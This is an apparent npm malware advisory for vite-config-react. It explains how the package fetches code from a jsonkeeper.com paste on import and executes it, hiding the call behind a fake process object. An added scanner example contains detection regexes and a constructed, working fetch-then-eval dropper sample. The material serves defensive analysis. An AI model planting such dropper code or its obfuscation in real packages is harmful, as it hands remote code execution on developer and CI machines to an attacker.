MAL-2026-5728
Malicious code in vite-config-react (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552)

On `require`/`import` of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports features/extras/config.js, which runs an IIFE that performs `axios.get('https://www.jsonkeeper.com/b/AAON3', { headers: { 'x-secret-key': '_' } })`, reads `.data.config` from the response, and executes the returned string via `new Function('require', s)(require)` with a Node `require` constructed through `createRequire(import.meta.url)`. The fetch-and-eval is wrapped in a 5-attempt retry loop with a swallowed try/catch.

The dropper additionally shadows the global `process` with a local object whose keys are renamed `DEV_API_KEY`, `DEV_SECRET_KEY`, `DEV_SECRET_VALUE` so the hardcoded URL and header read like ordinary environment-variable lookups, and the wrapper function is named `getCallers` to obscure intent.

jsonkeeper.com is an anonymous, mutable paste host with no hash pinning — the operator can swap the executed payload at any time. Any project that imports this package (for example in `vite.config.js`) hands the author arbitrary code execution on the developer's or CI machine with full `require` access.
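Added example, not code from the advisory or from the package: a small static scanner that looks for the fetch-then-eval dropper shape described above (an HTTP client call, `new Function('require', …)`, `createRequire(import.meta.url)`, a shadowed `process` object, an empty catch, a paste host). The regex heuristics, the paste-host list beyond jsonkeeper.com, and the two sample sources are constructed assumptions.

```javascript
// Added example (not the advisory's or the package's code): static indicators for the
// fetch-then-eval dropper shape. The regexes and the paste-host list are heuristics.
const INDICATORS = [
  // HTTP client call that could pull a payload at runtime
  ['remote_fetch', /\b(?:axios\.get|fetch|https?\.get)\s*\(/],
  // Dynamic code execution that is handed a `require` parameter
  ['eval_with_require', /new\s+Function\s*\(\s*['"]require['"]/],
  // Node `require` manufactured inside an ES module
  ['create_require', /createRequire\s*\(\s*import\.meta\.url\s*\)/],
  // Local object shadowing the global `process`, so URLs read like env lookups
  ['shadowed_process', /\b(?:const|let|var)\s+process\s*=\s*\{/],
  // Empty catch: errors swallowed, typical of a retry-until-success dropper
  ['swallowed_catch', /catch\s*(?:\([^)]*\))?\s*\{\s*\}/],
  // Anonymous, mutable paste host (assumed list; jsonkeeper.com is from the advisory)
  ['paste_host', /\b(?:jsonkeeper\.com|pastebin\.com|paste\.ee)\b/i],
];

// Returns the matched indicator names and a verdict. A remote fetch and an eval that
// receives `require` in the same file is the core of the dropper, so that pair flags it.
function scanSource(source) {
  const indicators = INDICATORS.filter(([, re]) => re.test(source)).map(([n]) => n);
  const verdict = indicators.includes('remote_fetch') &&
    indicators.includes('eval_with_require') ? 'suspicious' : 'clean';
  return { indicators, verdict };
}

// Constructed sample that mirrors the advisory's description (not the real package code)
const DROPPER_SAMPLE = `
import axios from 'axios';
import { createRequire } from 'module';
const require = createRequire(import.meta.url);
const process = { env: { DEV_API_KEY: 'https://www.jsonkeeper.com/b/PLACEHOLDER',
                         DEV_SECRET_KEY: 'x-secret-key', DEV_SECRET_VALUE: '_' } };
(async function getCallers() {
  for (let i = 0; i < 5; i++) {
    try {
      const r = await axios.get(process.env.DEV_API_KEY,
        { headers: { [process.env.DEV_SECRET_KEY]: process.env.DEV_SECRET_VALUE } });
      new Function('require', r.data.config)(require);
      return;
    } catch (e) {}
  }
})();`;
// Constructed benign sample: a plain Vite config that does no network I/O or eval
const BENIGN_SAMPLE = `
import react from '@vitejs/plugin-react';
export default { plugins: [react()], server: { port: 5173 } };`;

console.log(scanSource(DROPPER_SAMPLE).verdict, scanSource(BENIGN_SAMPLE).verdict);
```

Run it over each `.js`/`.mjs` file in `node_modules/<package>` after install; a hit on `remote_fetch` plus `eval_with_require` is worth a manual read before the package is allowed into a build.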
Affected packages
No fixed version published yet for vite-config-react (npm). Pin to a known-safe version or switch to an alternative.